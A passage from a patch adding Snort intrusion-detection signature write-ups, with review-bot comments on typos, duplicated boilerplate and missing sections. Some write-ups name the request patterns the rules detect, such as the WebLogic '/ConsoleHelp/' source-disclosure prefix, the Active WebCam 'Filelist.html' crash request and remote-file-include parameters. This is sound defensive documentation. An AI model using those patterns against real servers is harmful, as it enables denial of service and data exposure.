+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBazar
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
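Review bot: `"action=edit_member&value=1" parameter` is not a parameter name but two query-string pairs (`action=edit_member` and `value=1`), so neither Summary nor Detailed Information says which parameter of `admin.php` carries the remote file URL; name the actual include parameter and keep `action=edit_member&value=1` as the request context the rule matches on. As in the other remote file include files: empty Additional References, `running ona web server`, `attackers choosing`, the redundant `may indicate that an exploitation attempt has been attempted`, and trailing whitespace on most wrapped lines.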
--- /dev/null
+++ b/doc/signatures/1591.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1591
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
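Review bot: word-for-word duplicate of 889.txt except for the Sid, and 854.txt below repeats the same text again; see the comment on 889.txt. Without the script name the `None known.` under False Positives cannot be evaluated, and the empty Additional References gives no way to look the vulnerability up.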
--- /dev/null
+++ b/doc/signatures/1988.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1988
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
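Review bot: the `Affected Systems:` section is missing; the file goes from Detailed Information straight to Attack Scenarios while every other file in the patch carries it. Add it with the client or protocol the rule matches, which the Additional References (MSN protocol documents) suggest is MSN Messenger. `Sid: 1988` is inline where the other files put the number on its own line, `unkown` should be `unknown`, and `Brian Caswell <brian.caswell@sourcefire.com>` differs from the `<bmc@sourcefire.com>` address used for him elsewhere in the patch, worth confirming. The Additional References entries are also not blank-line separated as they are in 579.txt and 122-14.txt.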
--- /dev/null
+++ b/doc/signatures/3230.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3230
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
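Review bot: third verbatim copy of 3350.txt (see also 3376.txt) with only the Sid changed; see the comment on 3350.txt. Someone triaging an alert for Sid 3230 needs to know which request pattern sets it apart from the other two rules.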
--- /dev/null
+++ b/doc/signatures/1156.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1156
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
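Review bot: the Rule: section at the top of 1156.txt is empty and the Summary and Detailed Information only say "a known vulnerability on a web server", so a reader cannot tell what request pattern sid 1156 matches or which product is affected; add the rule text (or at least the matched URI/content) and narrow "Affected Systems: All systems using a web server" to the product the signature targets. "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" says nothing actionable and should be replaced by the specific scenario. Also "attackers choosing" in Impact should read "attacker's choosing", and the empty Additional References block should cite the advisory the rule was written from.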
--- /dev/null
+++ b/doc/signatures/854.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+854
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
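Review bot: "a CGI application running ona web server" in Detailed Information is missing a space ("on a"), and the whole CGI description in 854.txt is generic boilerplate that never names the CGI program or request that sid 854 matches; please name the script and add its advisory under the empty Additional References. Corrective Action here also drops the "Check the host logfiles and application logs for signs of compromise" line that the sibling 1156.txt has; keep the two consistent.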
--- /dev/null
+++ b/doc/signatures/2475.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2475
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
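Review bot: Summary and body of 2475.txt disagree about what the rule detects: the Summary says access to ADMIN$, but Detailed Information describes the drive-letter shares ("%DRIVE_LETTER% + $", i.e. C$) and Attack Scenarios talks about "files located on the C drive". ADMIN$ is the share of the Windows system directory, not a drive root, so one of the two is describing a different signature; fix whichever is wrong. The Corrective Action "Disallow Netbios access from external networks (tcp port 139)" should also cover direct SMB on tcp port 445, which Windows 2000 and later use without NetBIOS; blocking 139 alone leaves the share reachable. The separator before Additional References is "-- " with trailing whitespace.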
--- /dev/null
+++ b/doc/signatures/833.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+833
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
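Review bot: the body of 833.txt is identical to 854.txt earlier in this patch, down to the "running ona web server" typo; two signatures with different Sids cannot share one description. Replace the boilerplate with the CGI script and request pattern that sid 833 actually matches, fix the typo, and fill the empty Additional References.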
--- /dev/null
+++ b/doc/signatures/1958.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1958
+
+--
+Summary:
+This event is generated when an attempt is made to ping the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Intelligence gathering activity.  The sadmind ping will verify if the daemon is running.
+
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite applications to perform remote distributed system administration tasks such as adding new users.  The ping function associated with the sadmind daemon will verify if it is active. 
+
+--
+Affected Systems:
+All systems running sadmind.
+
+--
+Attack Scenarios:
+An attacker can ping the sadmind daemon to verify if it is active.  There are several exploits associated with this daemon.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/866
+
+--
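Review bot: "False Positives: None Known." conflicts with the Detailed Information, which says sadmind is used by Solaris Solstice AdminSuite for remote administration; a legitimate AdminSuite console will issue the same sadmind ping from a management host, so the section should say so and suggest excluding those hosts (the sibling 1274.txt does this for ttdbserverd). The Corrective Action sentence "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" reads as if it denies access to the machines themselves; "Filter portmapper and RPC ports at the firewall so that external hosts cannot reach RPC-enabled machines" is clearer. The doubled blank line after Impact and the trailing whitespace on "Simple.  " should also go.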
--- /dev/null
+++ b/doc/signatures/1051.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1051
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
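Review bot: the Affected Systems section in 1051.txt is empty, and the document is inconsistent about the target: Detailed Information says "web, web applications and ftp servers", while Attack Scenarios only covers browsing "outside the ftp root directory". State which service and which traversal pattern sid 1051 matches and fill Affected Systems accordingly; the empty Additional References block should get a pointer to the relevant advisory. "Rule:  " at the top carries trailing whitespace, as does the "-- " separator before Additional References.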
--- /dev/null
+++ b/doc/signatures/100000130.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000130
+
+-- 
+Summary: 
+This event is generated when a request for the file "Filelist.html" is sent to 
+the PY Software Active Webcam Server. 
+
+-- 
+
+Impact: 
+A denial of service will result, and the server will need to be manually 
+restarted.
+
+--
+Detailed Information:
+Requests for the file "Filelist.html" will cause the PY Software Active Webcam 
+Server to crash. This rule looks for such requests on port 8080, the default 
+port for this server.
+
+--
+Affected Systems:
+PY Software Active WebCam 4.3
+PY Software Active WebCam 5.5
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no known workarounds or fixes.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
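Review bot: "False Negatives: None Known." contradicts Detailed Information, which says the rule "looks for such requests on port 8080, the default port for this server": an Active Webcam server configured on any other port will not trigger the rule, and that should be recorded under False Negatives (or the rule should use a port variable). Since Corrective Action says there is no fix, it should at least recommend restricting access to the server's port to trusted hosts. Additional References is empty although Affected Systems names specific versions (4.3 and 5.5) that must come from an advisory; cite it. Several separators in this file are "-- " with trailing whitespace and some sections are preceded by an extra blank line; match the layout of the other files.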
--- /dev/null
+++ b/doc/signatures/2827.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2827
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_master_repobject
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
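Review bot: the procedure name in Detailed Information is broken across lines ("alter_master_repobject" followed by a line starting ". This procedure is included in"), so the sentence reads "alter_master_repobject . This procedure"; join it onto one line. "Affected Systems: Oracle Oracle9i" repeats the vendor name. "Ease of Attack: Simple." omits that, as the sibling 2599.txt states for the related replication procedure, invoking a PL/SQL procedure in sys.dbms_repcat_mas requires an authenticated database session with execute rights on the package; record that prerequisite in Attack Scenarios. Additional References is empty; cite the vendor alert for the overflow. Several "-- " separators carry trailing whitespace.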
--- /dev/null
+++ b/doc/signatures/1274.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1274
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap
+GETPORT request to discover the port where the Remote Procedure Call
+(RPC) ttdbserverd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port
+ttdbserverd is using. Attackers can also learn what versions of the
+ttdbserverd protocol are accepted by ttdbserverd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can
+be queried to determine the port where RPC services such as ttdbserverd
+run. The ttdbserverd RPC service, more commonly known as the ToolTalk
+database server, allows applications used in Common Desktop Environment
+(CDE) to communicate. The ToolTalk service receives ToolTalk messages
+created and sent by applications and delivers them to the appropriate
+recipient applications. The ToolTalk database server comes enabled on
+hosts with CDE. Multiple vulernabilities have been associated with the
+ToolTalk database server. 
+
+--
+Affected Systems:
+	All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where
+ttdbserverd runs. This may be a precursor to accessing ttdbserverd.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ttdbserverd, this rule
+may generate an event.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ttdbserverd, not
+probes of the ttdbserverd service itself. Because RPC services often
+listen on fairly arbitrary ports, it may not be possible to detect
+misuses of the ttdbserverd service itself. An attacker may attempt to go
+directly to the ttdbserverd port without querying the portmapper
+service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
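Review bot: "vulernabilities" in Detailed Information should be "vulnerabilities". The same paragraph says "Multiple vulnerabilities have been associated with the ToolTalk database server" but Additional References is empty; cite at least one advisory so an analyst can judge the severity of a GETPORT probe. "Affected Systems: All hosts running the UNIX portmapper" is what the rule matches, but the exposure only exists on hosts that also run ttdbserverd (CDE); consider stating both. The False Positives and False Negatives sections here are good and should be the model for the other RPC documents in this patch.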
--- /dev/null
+++ b/doc/signatures/100000584.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000584
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "checkurl_web.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"checkurl_web.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
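Review bot: the Detailed Information in 100000584.txt appends two boilerplate paragraphs that do not apply to the signature: "credentials of a client host connecting to the services" and the Attack Scenarios about supplying "his/her own credentials" describe an authentication bypass, not a remote file include via the "admin_template_path" parameter. Replace them with the RFI scenario (a URL to an attacker-controlled file passed in that parameter and included by the PHP interpreter), note that this depends on the PHP allow_url_include / allow_url_fopen settings being enabled, and add disabling them to Corrective Action. "running ona web server" needs a space, "exploitation attempt has been attempted" is redundant, and Affected Systems should name the Indexu versions rather than "All systems running CGI applications using Indexu"; the script is PHP, not CGI. The blank line before the "--" after Sid is missing, unlike the other files.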
--- /dev/null
+++ b/doc/signatures/601.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid:
+601
+
+--
+Summary: 
+This event is generated when an attempt is made to exploit a
+machine using Network Information Services (NIS).
+
+--
+Impact: 
+Unknown. This is traffic that should not be seen when using NIS and
+remote login services.
+
+--
+Detailed Information: 
+This event is generated when spurious data is sent to the rlogin service
+running on a machine that is using NIS.
+
+--
+Attack Scenarios: 
+An attacker needs to generate this traffic and send it directly to a
+machine. This is not normal network behavior.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
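Review bot: 601.txt has no Affected Systems section at all, the Impact is given as "Unknown", and while the Summary says an attempt "to exploit a machine using Network Information Services (NIS)", Detailed Information says only that "spurious data is sent to the rlogin service"; the document never explains what that data is or why it indicates an NIS-related attack, so an analyst cannot judge the alert. Describe the matched content and its relationship to NIS, add an Affected Systems section (hosts running rlogind with NIS), and state the Impact. The Corrective Action "Use ssh for remote access instead of rlogin" is the right advice and could add "and disable rlogind". The separator before Additional References is "-- " with trailing whitespace.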
--- /dev/null
+++ b/doc/signatures/330.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 330
+
+-- 
+Summary: 
+This is an intelligence gathering activity. This event is indicative of a connection laundering attack against the finger daemon
+
+-- 
+Impact: 
+The attacker may obtain information about a third party host without making a direct connection to that host.
+
+--
+Detailed Information:
+The event is generated when an attempt to use a machine to run
+finger queries against a third party UNIX system is attempted. 
+
+The attack utilizes "finger forwarding" functionality, normally used to forward queries to a third party machine. The information is obtained without a direct connection to the said third party, since the target system performs a connection to the third party host for the attacker. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack if successful, will confirm that the target host will try to forward queries.
+
+--
+Attack Scenarios: 
+An attacker runs a finger query and obtains information about the root account. He then proceeds to compromise the system using the obtained data as a basis for the compromise.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Disable the finger daemon or upgrade to a daemon without finger forwarding functionality
+
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0105
+
+Arachnids:
+http://www.whitehats.com/info/IDS251
+
+--
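Review bot: the CVE link in Additional References uses the retired "CAN-" candidate prefix (CAN-1999-0105); MITRE dropped candidate numbering in 2005 and the identifier is now CVE-1999-0105, so update the link text. Attack Scenarios describes a plain finger query for the root account, not the forwarding (user@hostB@hostA) attack that the Summary and Detailed Information are about; rewrite it so the scenario matches the signature, and move the first Summary sentence ("This is an intelligence gathering activity.") to Impact. "Sid: 330" is on one line whereas every other file in this patch puts the number on the following line, there is no Affected Systems section, and several "-- " separators carry trailing whitespace.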
--- /dev/null
+++ b/doc/signatures/2238.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2238
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in BEA Systems WebLogic Enterprise.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Some versions of BEA Systems WebLogic Enterprise allow an attacker to 
+view the aplication source code of documents in the web root of the 
+server.
+
+--
+Affected Systems:
+	BEA Systems WebLogic Enterprise 5.1, 5.1.x
+
+--
+Attack Scenarios:
+An attacker can view the source code and use that information to further
+exploit the server.
+
+The attacker merely needs to prepend an HTTP request with 
+"/ConsoleHelp/" to view the source of any file.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1518
+
+--
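Review bot: "aplication source code" in Detailed Information should be "application source code". "prepend an HTTP request with "/ConsoleHelp/"" is imprecise: the attacker prefixes the request path (requesting /ConsoleHelp/ followed by the path of the target file) so that the file is returned as text rather than executed; say that explicitly, since that path prefix is presumably what the rule matches. The Ease of Attack block is missing the blank line before "--" that the other sections have, and the separator before Additional References has trailing whitespace.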
--- /dev/null
+++ b/doc/signatures/100000762.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000762
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Randshop" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "incl" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
